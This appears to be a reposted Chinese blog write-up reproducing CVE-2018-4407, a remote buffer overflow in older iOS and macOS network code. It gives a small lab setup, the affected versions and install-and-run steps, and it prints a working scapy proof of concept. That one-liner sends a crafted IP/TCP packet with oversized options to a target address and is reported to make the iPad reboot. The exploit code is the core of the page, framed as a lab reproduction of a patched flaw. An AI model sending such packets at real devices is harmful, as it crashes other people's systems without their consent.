close

Mac

Mac

CVE-2018-4407(IOS缓冲区溢出漏洞复现)

macOS

环境:用手机开启的热点,pc本一台,ipad一台

pc电脑:192.168.43.30

ipad:192.168.43.145

影响版本

Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备)

Apple macOS High Sierra(受影响的最高版本为10.13.6):
所有设备(通过安全更新2018-001修复)

Apple macOS Sierra(受影响的最高版本为10.12.6):
所有设备(通过安全更新2018-005中修复)

Apple OS X El Capitan及更早版本:所有设备

首先设备需要连接在同一个局域网内

然后查看你的苹果系统版本是否符合、这里是11的版本那么可以使用这个poc进行复现的

安装scapy模块
pip install scapy

执行脚本程序
python cve-2018-4407.py

最后执行成功、iPad被重启

附上poc

#pip install scapy

import scapy
from scapy.all import *

send(IP(dst="192.168.43.145",options=[IPOption("A"*8)])/TCP(dport=2323,
options=[(19, "1"*18),(19, "2"*18)]))

文章转载零组攻防实验室

其他文献参考:
FreeBuf
FreeBuf

read more